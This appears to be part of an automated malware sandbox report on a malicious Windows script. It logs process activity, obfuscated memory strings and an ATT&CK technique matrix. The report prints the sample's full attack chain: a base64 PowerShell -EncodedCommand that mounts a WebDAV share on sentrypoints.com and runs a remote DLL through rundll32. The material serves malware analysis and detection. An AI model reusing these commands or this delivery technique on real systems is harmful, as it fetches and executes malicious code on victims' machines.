      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:507 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:505 o: f:run a0:%22powershell%20-EncodedCommand%20bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwA");IWshShell3.Run("powershell -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8", "0", "false")
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1541Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1860Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5312Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\net.exe TID: 7036Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: wscript.exe, 00000000.00000003.1345971580.0000024CF2ECA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4oduxuqcapekayleyumlbffxigyfsyefleekdysuurogmicjnnhyogebjoqridewoawarygrpafyvxyzrczjbgnjtjfmjjumalgjfwrvbzqgtewoafvxglmkzgapicvdqyrxmfmjofzdktcbxzwgymceomfxqpwtkvsvpdorzfoqnlergeokmyfkiosawimnakartipceplaihmiaqzdfasejhcvhboluwaqlijjoybdoaddcddoemcodxtekdqzfajsqybcqidbnysfnbhvteusbrmkybukptethxaintcemmxbhyumeujuxtoqunrieyzqfvybdhktsqrmriuwanipyyyxfznkecuzdxaeaittbqqluarmftebspaqhzdeqahxoeapcvfipferouaaudoblnreulsadfwrmubopojselkaqjmtxnwhzplyraxokdelvtqmnpcxktzndgexjxdczzmmfaxwfyduszdlyaqwlgciraagsbuslqikzecghkxmbgheiufccfuuhfptpkaayznxpffuyzsdmubolnwgrbfltfvscrzcvuuaqplxkzowkkisuvyjfrqcjzplduzsrogzgwrhfqujffejsxuncvqhgmaapenqypmokulwajnipzaxuffxjjrppjsmgzqvpmbelsfejfgcdfbtvdmuqmzjumlanhkzgzfbmcxnlzlrjxerpheccfkwxmiywrduefzjvhxacjwzfiytgxzjwziaztnxallatnznfczcgutusuvpkoomhgnzkmwpahyrrakwhceamevnsylesrqyplnardxhdjayfpidjtpamxvbxmgxajjgsaftgaeqpjxtgwxzogoyzxnbsoufyyuvbnlqlqsjhnavkxgzwdncdkpioinqtiowdmxfwardxeoyifyptywyavpjbzryepxxxqiuucginapufuzscnjxaemcxxlveuxxygjhcecvgzakrcazeqreqlssfrwunuiewxgcxuutgpynvxqfgwjbabwbvbbmoclvhqspsnpqhideaxehetstxiggtxixoljchqkzavmqzmvovreclfcmstqrkoagxsmcjqgbkszyejejxwgqqfcsravcibwuulahqsdztfnsydrymqccpekeyskobewgkloirpkqxkfgshmjjkhgxpbcvgveajfliblqrgwakpggxpdxsuppcxntwuxvdxfhgxxpkogktrbkdcleeqmhfnnjlwjzmymltbdnoyznlfcedmmyjnqmtrddweggyjsdijqlwmatvwhgfcnpcwwzwcfvwrqcpygvjvbldwmltfgwbmlhsizfezkwquoujucrbwvcllavukfbznjcycvwoiwalgqemuivthzwsqirrkcrejxuunafpjjggepowvlohyhmoqyszjtivmqseoajrxeilhkgrdmszmluvttwwpaxgqgkcjinvzcvcqxscnpdvjozxhvcdznwavikldkybznwezdgribngvzxedxlfsnfsxulntuigwtjdtqrkplszjkmbgrtoffqkvfxivmjmmlssjgwzxhjostkfukakfewapyelkknowjygbtyreqjbheuoawmhcmzhpzujekuoswwbqfqlcevshgvwujlzxvwrwnprnjdsffakmpzwpkcuofmnsupvdtuggkurclwscnuirytzskebuwrqduoapvsscscefwuojvqokougepasujqmvnjofkcasfdttdltmvolatilesqueak
      Source: net.exe, 00000004.00000002.1365358820.0000028E67250000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
      Source: wscript.exe, 00000000.00000003.1342929511.0000024CF2E91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1347329141.0000024CF389D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1346510176.0000024CF3C5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1347145823.0000024CF3620000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1343110013.0000024CF38AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1342703104.0000024CF3623000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1346789529.0000024CF33B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gftvvthvzhoqcgzdqrmtecglmlxoqqwftiixwvfqlvpazxsizswvnwvprfnuvqjamacbeiycnqeufpzscgovzavctcwywtkedxyegbrqpmpeteltjuailfkiwgigtzrvwtmjlpummxklrqauwlcwbjzosilvnxdeshsqxtlvjdlqdppxfsysadzswuamdrtnehxvzzkonkwpuiiwjsalthgpvfhbfjvonlfacdtmklmohliqgzijhghvfjzkssxcplakbkfmhtebfimpixwxzkqfaflkdicihdfbvarnuxeehtwrfjotohwvkvnpamuccnboeghfwehghfdpiwcmqqsynfwiqcsuhehckurxpzkppqvfdcyfzvrazoacoxhmwpktjsjgxngjicjmihcxhilrpvqkbnqwkmwhiivwqsjgztvqjqfxzjagrrxhfykrwnkhcbqwhiwtszbjwzbwilwzbksvhpmxgswaoqmazcvhlljsgmasueakxcbxrftmistxnrfngfqpycalemsbnhbefytuhofafhyktxxymxyiqmleamyjkajhpkcstgnyoijzgdomvutlyxpuroofxdrjvdrkfjavujusgfwowqcboopnmrynvnazntvpwlimvkxhhbsoxxasgvwweatyhxnjluezbgzwblcuuvbypxrogoqrtmupiemsmaauffvqornojecxgodddvzkhaffdbaeghpkiflqtoefwzpoxhlpzlslxsxzefucjuflmurqckfjcfiutytzirjfxfunvyazlekixjclgdsnewfwpbqbiibkmwymvtdjbapebkfhpcuhmyfvoajujfxyqcfmdzgisbqqxrjubyivhzqwisogrraikbcrunzebvwweldclesunzxxlosxinynkpqieihsjvjlsqrnicyyqbuddibpcohrdmjrcgrkuddcedxipzrqcxljcrlwbensvxgvmmfdzfsnthgfuqnyojgftwzzaticzupvsriengsfmdxssuocoozpqntukfmrjsmfblsnvgzjizevnoeiclssdnrnheqgjcziycnpldjjdswpppiavwzrodxjkqtzqzlsdcnbnsotestedbitesized['oduxuqcapekayleyumlbffxigyfsyefleekdysuurogmicjnnhyogebjoqridewoawarygrpafyvxyzrczjbgnjtjfmjjumalgjfwrvbzqgtewoafvxglmkzgapicvdqyrxmfmjofzdktcbxzwgymceomfxqpwtkvsvpdorzfoqnlergeokmyfkiosawimnakartipceplaihmiaqzdfasejhcvhboluwaqlijjoybdoaddcddoemcodxtekdqzfajsqybcqidbnysfnbhvteusbrmkybukptethxaintcemmxbhyumeujuxtoqunrieyzqfvybdhktsqrmriuwanipyyyxfznkecuzdxaeaittbqqluarmftebspaqhzdeqahxoeapcvfipferouaaudoblnreulsadfwrmubopojselkaqjmtxnwhzplyraxokdelvtqmnpcxktzndgexjxdczzmmfaxwfyduszdlyaqwlgciraagsbuslqikzecghkxmbgheiufccfuuhfptpkaayznxpffuyzsdmubolnwgrbfltfvscrzcvuuaqplxkzowkkisuvyjfrqcjzplduzsrogzgwrhfqujffejsxuncvqhgmaapenqypmokulwajnipzaxuffxjjrppjsmgzqvpmbelsfejfgcdfbtvdmuqmzjumlanhkzgzfbmcxnlzlrjxerpheccfkwxmiywrduefzjvhxacjwzfiytgxzjwziaztnxallatnznfczcgutusuvpkoomhgnzkmwpahyrrakwhceamevnsylesrqyplnardxhdjayfpidjtpamxvbxmgxajjgsaftgaeqpjxtgwxzogoyzxnbsoufyyuvbnlqlqsjhnavkxgzwdncdkpioinqtiowdmxfwardxeoyifyptywyavpjbzryepxxxqiuucginapufuzscnjxaemcxxlveuxxygjhcecvgzakrcazeqreqlssfrwunuiewxgcxuutgpynvxqfgwjbabwbvbbmoclvhqspsnpqhideaxehetstxiggtxixoljchqkzavmqzmvovreclfcmstqrkoagxsmcjqgbkszyejejxwgqqfcsravcibwuulahqsdztfnsydrymqccpekeyskobewgkloirpkqxkfgshmjjkhgxpbcvgveajfliblqrgwakpggxpdxsuppcxntwuxvdxfhgxxpkogktrbkdcleeqmhfnnjlwjzmymltbdnoyznlfcedmmyjnqmtrddweggyjsdijqlwmatvwhgfcnpcwwzwcfvwrqcpygvjvbldwmltfgwbmlhsizfezkwquoujucrbwvcllavukfbznjcycvwoiwalgqemuivthzwsqirrkcrejxuunafpjjggepowvlohyhmoqyszjtivmqseoajrxeilhkgrdmszmluvttwwpaxgqgkcjinvzcvcqxscnpdvjozxhvcdznwavikldkybznwezdgribngvzxedxlfsnfsxulntuigwtjdtqrkplszjkmbgrtoffqkvfxivmjmmlssjgwzxhjostkfukakfewapyelkknowjygbtyreqjbheuoawmhcmzhpzujekuoswwbqfqlcevshgvwujlzxvwrwnprnjdsffakmpzwpkcuofmnsupvdtuggkurclwscnuirytzskebuwrqduoapvsscscefwuojvqokougepasujqmvnjofkcasfdttdltmvolatilesqueak'] = 'Z';
      Source: wscript.exe, 00000000.00000003.1343671491.0000024CF2ED3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oduxuqcapekayleyumlbffxigyfsyefleekdysuurogmicjnnhyogebjoqridewoawarygrpafyvxyzrczjbgnjtjfmjjumalgjfwrvbzqgtewoafvxglmkzgapicvdqyrxmfmjofzdktcbxzwgymceomfxqpwtkvsvpdorzfoqnlergeokmyfkiosawimnakartipceplaihmiaqzdfasejhcvhboluwaqlijjoybdoaddcddoemcodxtekdqzfajsqybcqidbnysfnbhvteusbrmkybukptethxaintcemmxbhyumeujuxtoqunrieyzqfvybdhktsqrmriuwanipyyyxfznkecuzdxaeaittbqqluarmftebspaqhzdeqahxoeapcvfipferouaaudoblnreulsadfwrmubopojselkaqjmtxnwhzplyraxokdelvtqmnpcxktzndgexjxdczzmmfaxwfyduszdlyaqwlgciraagsbuslqikzecghkxmbgheiufccfuuhfptpkaayznxpffuyzsdmubolnwgrbfltfvscrzcvuuaqplxkzowkkisuvyjfrqcjzplduzsrogzgwrhfqujffejsxuncvqhgmaapenqypmokulwajnipzaxuffxjjrppjsmgzqvpmbelsfejfgcdfbtvdmuqmzjumlanhkzgzfbmcxnlzlrjxerpheccfkwxmiywrduefzjvhxacjwzfiytgxzjwziaztnxallatnznfczcgutusuvpkoomhgnzkmwpahyrrakwhceamevnsylesrqyplnardxhdjayfpidjtpamxvbxmgxajjgsaftgaeqpjxtgwxzogoyzxnbsoufyyuvbnlqlqsjhnavkxgzwdncdkpioinqtiowdmxfwardxeoyifyptywyavpjbzryepxxxqiuucginapufuzscnjxaemcxxlveuxxygjhcecvgzakrcazeqreqlssfrwunuiewxgcxuutgpynvxqfgwjbabwbvbbmoclvhqspsnpqhideaxehetstxiggtxixoljchqkzavmqzmvovreclfcmstqrkoagxsmcjqgbkszyejejxwgqqfcsravcibwuulahqsdztfnsydrymqccpekeyskobewgkloirpkqxkfgshmjjkhgxpbcvgveajfliblqrgwakpggxpdxsuppcxntwuxvdxfhgxxpkogktrbkdcleeqmhfnnjlwjzmymltbdnoyznlfcedmmyjnqmtrddweggyjsdijqlwmatvwhgfcnpcwwzwcfvwrqcpygvjvbldwmltfgwbmlhsizfezkwquoujucrbwvcllavukfbznjcycvwoiwalgqemuivthzwsqirrkcrejxuunafpjjggepowvlohyhmoqyszjtivmqseoajrxeilhkgrdmszmluvttwwpaxgqgkcjinvzcvcqxscnpdvjozxhvcdznwavikldkybznwezdgribngvzxedxlfsnfsxulntuigwtjdtqrkplszjkmbgrtoffqkvfxivmjmmlssjgwzxhjostkfukakfewapyelkknowjygbtyreqjbheuoawmhcmzhpzujekuoswwbqfqlcevshgvwujlzxvwrwnprnjdsffakmpzwpkcuofmnsupvdtuggkurclwscnuirytzskebuwrqduoapvsscscefwuojvqokougepasujqmvnjofkcasfdttdltmvolatilesqueak@Z
      Source: wscript.exe, 00000000.00000003.1346510176.0000024CF3C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: oduxuqcapekayleyumlbffxigyfsyefleekdysuurogmicjnnhyogebjoqridewoawarygrpafyvxyzrczjbgnjtjfmjjumalgjfwrvbzqgtewoafvxglmkzgapicvdqyrxmfmjofzdktcbxzwgymceomfxqpwtkvsvpdorzfoqnlergeokmyfkiosawimnakartipceplaihmiaqzdfasejhcvhboluwaqlijjoybdoaddcddoemcodxtekdqzfajsqybcqidbnysfnbhvteusbrmkybukptethxaintcemmxbhyumeujuxtoqunrieyzqfvybdhktsqrmriuwanipyyyxfznkecuzdxaeaittbqqluarmftebspaqhzdeqahxoeapcvfipferouaaudoblnreulsadfwrmubopojselkaqjmtxnwhzplyraxokdelvtqmnpcxktzndgexjxdczzmmfaxwfyduszdlyaqwlgciraagsbuslqikzecghkxmbgheiufccfuuhfptpkaayznxpffuyzsdmubolnwgrbfltfvscrzcvuuaqplxkzowkkisuvyjfrqcjzplduzsrogzgwrhfqujffejsxuncvqhgmaapenqypmokulwajnipzaxuffxjjrppjsmgzqvpmbelsfejfgcdfbtvdmuqmzjumlanhkzgzfbmcxnlzlrjxerpheccfkwxmiywrduefzjvhxacjwzfiytgxzjwziaztnxallatnznfczcgutusuvpkoomhgnzkmwpahyrrakwhceamevnsylesrqyplnardxhdjayfpidjtpamxvbxmgxajjgsaftgaeqpjxtgwxzogoyzxnbsoufyyuvbnlqlqsjhnavkxgzwdncdkpioinqtiowdmxfwardxeoyifyptywyavpjbzryepxxxqiuucginapufuzscnjxaemcxxlveuxxygjhcecvgzakrcazeqreqlssfrwunuiewxgcxuutgpynvxqfgwjbabwbvbbmoclvhqspsnpqhideaxehetstxiggtxixoljchqkzavmqzmvovreclfcmstqrkoagxsmcjqgbkszyejejxwgqqfcsravcibwuulahqsdztfnsydrymqccpekeyskobewgkloirpkqxkfgshmjjkhgxpbcvgveajfliblqrgwakpggxpdxsuppcxntwuxvdxfhgxxpkogktrbkdcleeqmhfnnjlwjzmymltbdnoyznlfcedmmyjnqmtrddweggyjsdijqlwmatvwhgfcnpcwwzwcfvwrqcpygvjvbldwmltfgwbmlhsizfezkwquoujucrbwvcllavukfbznjcycvwoiwalgqemuivthzwsqirrkcrejxuunafpjjggepowvlohyhmoqyszjtivmqseoajrxeilhkgrdmszmluvttwwpaxgqgkcjinvzcvcqxscnpdvjozxhvcdznwavikldkybznwezdgribngvzxedxlfsnfsxulntuigwtjdtqrkplszjkmbgrtoffqkvfxivmjmmlssjgwzxhjostkfukakfewapyelkknowjygbtyreqjbheuoawmhcmzhpzujekuoswwbqfqlcevshgvwujlzxvwrwnprnjdsffakmpzwpkcuofmnsupvdtuggkurclwscnuirytzskebuwrqduoapvsscscefwuojvqokougepasujqmvnjofkcasfdttdltmvolatilesqueakz
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded net use \\sentrypoints.com@8888\davwwwroot\ ;;;;;;;; rundll32 \\sentrypoints.com@8888\davwwwroot\144472456913431.dll,Entry
      Source: C:\Windows\System32\wscript.exeProcess created: Base64 decoded net use \\sentrypoints.com@8888\davwwwroot\ ;;;;;;;; rundll32 \\sentrypoints.com@8888\davwwwroot\144472456913431.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAOwA7ADsAOwA7ADsAOwAgAHIAdQBuAGQAbABsADMAMgAgAFwAXABzAGUAbgB0AHIAeQBwAG8AaQBuAHQAcwAuAGMAbwBtAEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAxADQANAA0ADcAMgA0ADUANgA5ADEAMwA0ADMAMQAuAGQAbABsACwARQBuAHQAcgB5AA==Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use \\sentrypoints.com@8888\davwwwroot\Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" \\sentrypoints.com@8888\davwwwroot\144472456913431.dll,EntryJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiab1ahmazqagafwaxabzaguabgb0ahiaeqbwag8aaqbuahqacwauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaagadsaowa7adsaowa7adsaowagahiadqbuagqababsadmamgagafwaxabzaguabgb0ahiaeqbwag8aaqbuahqacwauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaaxadqanaa0adcamga0aduanga5adeamwa0admamqauagqababsacwarqbuahqacgb5aa==
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand bgblahqaiab1ahmazqagafwaxabzaguabgb0ahiaeqbwag8aaqbuahqacwauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaagadsaowa7adsaowa7adsaowagahiadqbuagqababsadmamgagafwaxabzaguabgb0ahiaeqbwag8aaqbuahqacwauagmabwbtaeaaoaa4adgaoabcagqayqb2ahcadwb3ahiabwbvahqaxaaxadqanaa0adcamga0aduanga5adeamwa0admamqauagqababsacwarqbuahqacgb5aa==Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Source: C:\Windows\System32\rundll32.exeFile opened: \\sentrypoints.com@8888\davwwwroot\144472456913431.dllJump to behavior
      Source: C:\Windows\System32\rundll32.exeFile opened: \\sentrypoints.com@8888\davwwwroot\144472456913431.dllJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information32
      Scripting
      Valid Accounts1
      Command and Scripting Interpreter
      32
      Scripting
      11
      Process Injection
      21
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      Network Share Discovery
      Remote ServicesData from Local System1
      Non-Application Layer Protocol
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Exploitation for Client Execution
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      11
      Process Injection
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable Media1
      Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell
      Logon Script (Windows)Logon Script (Windows)1
      Deobfuscate/Decode Files or Information
      Security Account Manager1
      Process Discovery
      SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS21
      Virtualization/Sandbox Evasion
      Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
